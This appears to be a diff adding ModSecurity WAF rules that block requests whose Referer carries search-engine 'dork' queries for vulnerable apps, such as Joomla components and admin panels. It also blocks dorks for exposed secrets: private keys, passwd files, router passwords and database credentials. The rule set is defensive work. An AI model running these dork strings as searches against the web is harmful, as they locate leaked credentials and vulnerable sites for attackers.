+SecRule REQUEST_HEADERS:Referer   "inurl:com_kochsuite" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372725,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:/com_chronocontact" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372726,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by crownweb\.net! inurl:page\.cfm" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372729,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:\?pilih=forum" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372737,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:com_ybggal" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372777,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:com_djclassifieds" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372781,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:com_artlinks" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372782,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:/modernbill/" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372792,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:com_virtuemart" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372760,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:spaw2/dialogs/" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372770,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:com_ice catid" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372772,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:com_ahsshopdo=default" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372773,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:com_restaurante" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372799,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:com_simpledownload" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372801,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:e107_plugins" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372805,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:module=my_egallery pid" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372817,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:/components/je-media-player\.html\?" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372821,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:com_accombo" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372823,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:com_quickfaq" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372827,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:verliadmin" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372829,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:com_manager" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372832,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:com_linkdirectory" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372833,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:\.asp\?   powered by comersus asp shopping cart" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372838,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:inc_securedocumentlibrary\.asp" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372842,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:option=com_huruhelpdesk" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372843,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:pap-secrets -cvs " "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371092,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:chap-secrets -cvs " "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371093,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:passlist\.txt" "phase:2,deny,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371154,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "please enter a valid password! inurl:polladmin" "phase:2,deny,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371698,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "web-based management please input password to login" "phase:2,deny,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371702,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "in(?:text|body):master account  domain name password inurl:/cgi-bin/qmailadmin " "phase:2,deny,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371740,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "in(?:text|body):master account  domain name password inurl:/cgi-bin/qmailadmin " "phase:2,deny,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371745,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:flash operator panel -ext:php -wiki -cms -inurl:asternic -inurl:sip -intitle:announce -inurl:lists " "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371785,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "-login inurl:photopost/uploadphoto\.php" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371805,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:phphotoalbum/statistics intitle:phphotoalbum - statistics" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371806,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:phphotoalbum - upload \| inurl:phphotoalbum/upload" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371807,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:php advanced transfer inurl:login\.php" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371823,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:postfixadmin intitle:postfix admin ext:php" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371827,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:login\.php squirrelmail version" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371832,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:plesk inurl:login\.php3" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371834,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "\+powered by indexu inurl:\(browse\|top_rated\|power_search\|hot\|browse\|create_admin_user\) filetype:php" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371879,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "filetype:php inurl:webeditor\.php" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371881,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:/counter/index\.php intitle:\+phpcounter 7" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:321918,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:install/install\.php" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371935,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "you can now password \| this is a special page only seen by you\. your profile visitors  inurl:imchaos" "phase:2,deny,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371991,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+
+SecMarker END_RECON_CHECKS_INURL
+
+#intext
+SecRule REQUEST_HEADERS:Referer "@pm intext: inbody:"         "t:none,t:urlDecodeUni,t:htmlEntityDecode,id:333931,phase:2,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:313792,t:none,pass,nolog,noauditlog,skipAfter:END_RECON_CHECKS_INTEXT"
+SecRule REQUEST_HEADERS:Referer   "intext:.*proudly powered by wordpress" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:377001,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "in(?:text|body):steamuserpassphrase= in(?:text|body):steamappuser= -username  -user" "phase:2,deny,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371001,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "filetype:reg reg \+in(?:text|body):internet account manager" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371005,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "google for: \+in(?:text|body):webalizer \+in(?:text|body):total usernames \+in(?:text|body):usage statistics for" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371007,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "\(intitle:shoutcast administrator\)\|\(in(?:text|body):u shoutcast d\.n\.a\.s\. status\)" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371015,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "ext:php in(?:text|body):\$dbms\$dbhost\$dbuser\$dbpasswd\$table_prefixphpbb_installed" "phase:2,deny,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371038,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "filetype:reg reg \+in(?:text|body):”winvnc3”" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371041,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "ext:asa \| ext:bak in(?:text|body):uid in(?:text|body):pwd -uid\.\.pwd database \| server \| dsn" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371042,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "enable password \| secret current configuration -in(?:text|body):the" "phase:2,deny,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371043,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "ext:passwd -in(?:text|body):the -sample -example" "phase:2,deny,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371044,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:rapidshare in(?:text|body):login" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371055,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "in(?:text|body):enable password 7" "phase:2,deny,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371056,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "in(?:text|body):enc_userpassword=\*  ext:pcf" "phase:2,deny,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371066,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "in(?:text|body):enable secret 5 \$" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371089,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "filetype:config config in(?:text|body):appsettings user id" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371098,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "filetype:pass pass in(?:text|body):userid" "phase:2,deny,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371107,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "filetype:pem pem in(?:text|body):private" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371134,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "filetype:reg reg \+in(?:text|body):defaultusername \+in(?:text|body):defaultpassword" "phase:2,deny,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371141,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "filetype:inc in(?:text|body):mysql_connect" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371142,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:index\.of in(?:text|body):secring\.skr\|secring\.pgp\|secring\.bak" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371170,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "allin(?:text|body):fs-admin\.php" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371173,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "in(?:text|body):error message : error loading required libraries\." "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371188,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "in(?:text|body):warning: failed opening on line include_path" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371199,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "in(?:text|body):gmail invite in(?:text|body):http://gmail\.google\.com/gmail/a" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371295,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "ext:ini in(?:text|body):env\.ini" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371339,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "\( filetype:mail \| filetype:eml \| filetype:mbox \| filetype:mbx \) in(?:text|body):password\|subject " "phase:2,deny,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371360,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "mail filetype:csv -site:gov in(?:text|body):name" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371365,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "in(?:text|body):session start \* \* \* \*:\*:\* \* filetype:log" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371366,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "in(?:text|body):\(password \| passcode\) in(?:text|body):\(username \| userid \| user\)   filetype:csv" "phase:2,deny,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371377,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "filetype:blt blt \+in(?:text|body):screenname" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371405,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "filetype:lic lic in(?:text|body):key" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371408,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "filetype:eml eml \+in(?:text|body):subject \+in(?:text|body):from \+in(?:text|body):to" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371410,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "filetype:mbx mbx in(?:text|body):subject" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371411,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "in(?:text|body):tobias oetiker traffic analysis" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371418,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "in(?:text|body):target multicast group beacon" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371480,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:test page for the apache http server on fedora core in(?:text|body):fedora core test page" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371493,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:object not found! in(?:text|body):apache/2\.0\.\* \(linux/suse\)" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371507,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "in(?:text|body):404 object not found microsoft-iis/5\.0" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371514,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:300 multiple choices in(?:text|body):server\.at" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371537,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:phpstat in(?:text|body):browser in(?:text|body):phpstat setup" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371572,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "filetype:inc inc in(?:text|body):setcookie" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371602,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "allin(?:text|body):webserverx server at" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371607,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "filetype:ini desktop\.ini in(?:text|body):mydocs\.dll" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371622,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:directory listing for in(?:text|body):tomcat -intitle:tomcat" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371639,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "filetype:cfg ks in(?:text|body):rootpw -sample -test -howto" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371649,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
